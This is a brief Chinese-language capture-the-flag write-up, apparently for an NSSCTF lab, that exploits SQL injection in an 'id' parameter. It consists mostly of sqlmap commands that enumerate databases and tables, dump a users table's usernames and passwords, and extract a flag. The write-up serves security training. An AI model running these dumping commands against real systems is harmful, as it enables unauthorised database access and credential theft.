输入1,有注入点id
使用sqlmap爆库sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" --dbs --batch
sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctf --tables --batch
sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctf -T users --columns
sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctf -T users -C username,password --dump
这是彩蛋
爆ctftraining的表发现flag
sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctftraining --tables --batch
sqlmap -u "http://node5.anna.nssctf.cn:21477/?id=1" -D ctftraining -T flag -C flag --dump